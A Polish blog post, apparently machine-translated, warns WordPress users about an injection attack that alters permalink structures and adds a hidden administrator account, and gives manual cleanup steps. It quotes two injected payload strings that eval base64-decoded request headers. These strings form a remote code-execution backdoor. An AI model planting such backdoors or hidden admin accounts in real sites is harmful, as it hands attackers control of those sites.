Wiele witryn jest atakowanych przez ostatni atak SQL, w którym kody są wstrzykiwane do twojej witryny. Ten zastrzyk MySQL wpływa na twoje permalinks, czyniąc je nieskutecznymi. W rezultacie adresy URL postów na blogu nie będą działać. Liczne blogi WordPress były celem tego ataku, dzięki Andy ’ emu Sowardowi za zwrócenie naszej uwagi na to.
Był jeden z poniższych kodów, które zostały dodane do twojej struktury permalink z powodu tego ataku:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
„/%&(%7B$%7beval(base64_decode ($_SERVER%5BHTTP_EXECCODE%5d))%7d%7D|.+)&%
Te cytaty dołączone wszystkie permalinks na swojej stronie i może być zmieniony tylko wtedy, gdy usunięte ręcznie.
Aby to naprawić przejdź do:
Ustawienia > Permalinks i usuń powyższy kod i zastąp domyślny kod.
Następną rzeczą, którą musisz zrobić, to przejść do użytkowników. Zobaczysz, że jest więcej niż jeden administrator. Nie zobaczysz ich nazwiska na liście, ale zobaczysz zwiększoną liczbę. Więc to, co musisz zrobić, to spojrzeć na wszystkich użytkowników i znaleźć ostatniego, który się zarejestrował. Umieść kursor myszy nad tym użytkownikiem i uzyskaj link. Zmień kod userid = dodając 1 do tej liczby. Więc jeśli ostatni użytkownik, który widzisz, był użytkownikiem # 2, Dodaj do niego 1 i ustaw go na 3. Powinieneś znaleźć ukryty administrator ma dziwny kod jako imię. Usuń kod i uczyń go abonentem. Więc wróć i usuń go.
To powinno rozwiązać problem. Możesz również go usunąć, po prostu przechodząc do swojego PHPMyAdmin. Ponieważ zobaczysz tam użytkownika.
Chcieliśmy tylko, aby ta wiadomość została opublikowana tak szybko, jak to możliwe, aby nasi użytkownicy mogli być aktualizowani. Upewnij się, że twój blog nie jest zainfekowany. Mamy nadzieję, że WordPress wyjdzie wkrótce z wydaniem.
Również jeśli nie wdrożyłeś niektórych z tych środków, aby zabezpieczyć swój obszar administracyjny WordPress.